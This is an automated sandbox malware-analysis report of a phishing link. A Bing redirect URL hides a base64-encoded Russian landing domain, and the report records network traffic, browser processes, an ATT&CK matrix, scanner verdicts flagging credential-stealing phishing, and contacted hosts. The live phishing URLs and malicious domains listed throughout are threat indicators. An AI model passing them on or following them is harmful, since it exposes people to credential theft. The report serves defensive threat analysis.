Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:41:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=saFgmiTc5V41N8BgPBOMaBvy7irAvCw%2Btf3FREkyT8h9lOkR3%2FyLaeY6s%2B9SSfoqZyWMbiEXBp2PkYnjSiYdr16KA6dwwvSm07Ed8EgdJZnHJ%2FCXmi1HeYiivW2H5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4351&min_rtt=4329&rtt_var=1639&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2141&delivery_rate=657888&cwnd=235&unsent_bytes=0&cid=29ada7859f713f83&ts=4616&x=0"CF-Cache-Status: HITAge: 14381Server: cloudflareCF-RAY: 8f42a9b07bf90f51-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1708&rtt_var=662&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1895&delivery_rate=1626740&cwnd=204&unsent_bytes=0&cid=d1a5b15ed5311229&ts=9228&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:41:58 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: JEsArl5SmRfB7d6lH3eAWjrtwmuOXuLTgdQ=$Vi2vS0NdwCooZiv1cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f42a9d16f930f78-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:42:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: +Kx5LjMh8gNNwI5lvoYZ8QxPZk5FrP5Mgbw=$8nwB9IVwbnG0hr4gServer: cloudflareCF-RAY: 8f42a9f8b84b4391-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 22:42:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: wQV7PJRBo+kkqqUN9BpdmvRGCXyYyynK7TY=$382M1K3M0Yig3Vqzcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f42aa352f084273-EWRalt-svc: h3=":443"; ma=86400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal60.win@25/22@43/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,11789529794764029990,16469808625315113914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,11789529794764029990,16469808625315113914,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=0%Avira URL Cloudsafe
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.yuxingketang.com/collections/throw-blankets/100%Avira URL Cloudmalware
https://to.eemjhiulz.ru/favicon.ico0%Avira URL Cloudsafe
https://www.yuxingketang.com/collections/throw-blankets100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    google.com
    142.250.181.110
    truefalse
      high
      code.jquery.com
      151.101.66.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.95.41
          truefalse
            high
            jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ru
            172.67.188.29
            truefalse
              unknown
              www.yuxingketang.com
              104.21.17.162
              truefalse
                high
                to.eemjhiulz.ru
                172.67.166.86
                truetrue
                  unknown
                  www.google.com
                  142.250.181.132
                  truefalse
                    high
                    www.microsoftonline.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/false
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJbfalse
                          high
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f42a9a00a2d7286/1734561715620/LUY0Aidy7FWWS4Pfalse
                              high
                              https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                high
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  high
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f42a9a00a2d7286&lang=autofalse
                                      high
                                      https://to.eemjhiulz.ru/zO7RFNG/true
                                        unknown
                                        https://www.yuxingketang.com/collections/throw-blanketsfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://www.yuxingketang.com/collections/throw-blankets/#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=false
                                          unknown
                                          https://www.yuxingketang.com/collections/throw-blankets/false
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f42a9a00a2d7286/1734561715617/fdc9e8a73be2f5579622a47fd9ecfbe90b77079a2071ace2a9e0cdd32ad713a1/KjYAtqfG7Q3SeXbfalse
                                            high
                                            https://a.nel.cloudflare.com/report/v4?s=saFgmiTc5V41N8BgPBOMaBvy7irAvCw%2Btf3FREkyT8h9lOkR3%2FyLaeY6s%2B9SSfoqZyWMbiEXBp2PkYnjSiYdr16KA6dwwvSm07Ed8EgdJZnHJ%2FCXmi1HeYiivW2H5A%3D%3Dfalse
                                              high
                                              https://to.eemjhiulz.ru/favicon.icofalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.17.24.14
                                              cdnjs.cloudflare.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              104.21.17.162
                                              www.yuxingketang.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              104.21.7.246
                                              unknownUnited States
                                              13335CLOUDFLARENETUSfalse
                                              104.18.94.41
                                              unknownUnited States
                                              13335CLOUDFLARENETUSfalse
                                              104.18.95.41
                                              challenges.cloudflare.comUnited States
                                              13335CLOUDFLARENETUSfalse
                                              142.250.181.132
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              239.255.255.250
                                              unknownReserved
                                              unknownunknownfalse
                                              151.101.66.137
                                              code.jquery.comUnited States
                                              54113FASTLYUSfalse
                                              172.67.188.29
                                              jcbd2x22nmnzpbhzhkvcbkfhnn7orm5itv63fclxpsluksznwtgigu4oa9fg.ssbvteke.ruUnited States
                                              13335CLOUDFLARENETUSfalse
                                              151.101.194.137
                                              unknownUnited States
                                              54113FASTLYUSfalse
                                              35.190.80.1
                                              a.nel.cloudflare.comUnited States
                                              15169GOOGLEUSfalse
                                              172.67.166.86
                                              to.eemjhiulz.ruUnited States
                                              13335CLOUDFLARENETUStrue
                                              104.17.25.14
                                              unknownUnited States
                                              13335CLOUDFLARENETUSfalse
                                              IP
                                              192.168.2.4
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1577974
                                              Start date and time:2024-12-18 23:40:28 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 2m 59s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:browseurl.jbs
                                              Sample URL:https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal60.win@25/22@43/14
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.78, 64.233.162.84, 142.250.181.142, 172.217.17.46, 2.16.158.88, 2.16.158.169, 2.16.158.96, 2.16.158.26, 2.16.158.43, 199.232.214.172, 192.229.221.95, 172.217.17.35, 23.218.208.109, 4.245.163.56, 13.107.246.63, 52.149.20.212
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=
                                              No simulations
                                              No context
                                              No context
                                              No context
                                              No context
                                              No context
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                              Category:dropped
                                              Size (bytes):48316
                                              Entropy (8bit):5.6346993394709
                                              Encrypted:false
                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                              MD5:2CA03AD87885AB983541092B87ADB299
                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                              Malicious:false
                                              Reputation:low
                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                              Category:downloaded
                                              Size (bytes):48316
                                              Entropy (8bit):5.6346993394709
                                              Encrypted:false
                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                              MD5:2CA03AD87885AB983541092B87ADB299
                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65447)
                                              Category:downloaded
                                              Size (bytes):89501
                                              Entropy (8bit):5.289893677458563
                                              Encrypted:false
                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                              Malicious:false
                                              Reputation:low
                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65447)
                                              Category:dropped
                                              Size (bytes):89501
                                              Entropy (8bit):5.289893677458563
                                              Encrypted:false
                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 46 x 69, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):61
